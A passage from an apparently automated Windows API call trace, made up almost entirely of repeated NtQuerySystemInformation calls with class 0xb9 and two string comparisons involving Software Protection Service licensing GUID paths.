NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc880, Length=0x20, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.590] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd78, Length=0x50, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0280.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0280.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.594] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbc0, Length=0x28, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x38, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x20, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x50, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0280.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0280.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x28, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0280.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x38, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x20, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x20, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.607] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc08, Length=0x50, ResultLength=0x0) [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9d0, Length=0x28, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0280.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x20, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x38, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x20, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x20, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) [0280.615] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.615] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0280.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0280.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x28, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd60, Length=0x28, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcde0, Length=0x28, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccc0, Length=0x20, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcec0, Length=0x38, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x20, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0280.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd0, Length=0x20, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf90, Length=0x50, ResultLength=0x0) [0280.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf10, Length=0x28, ResultLength=0x0) 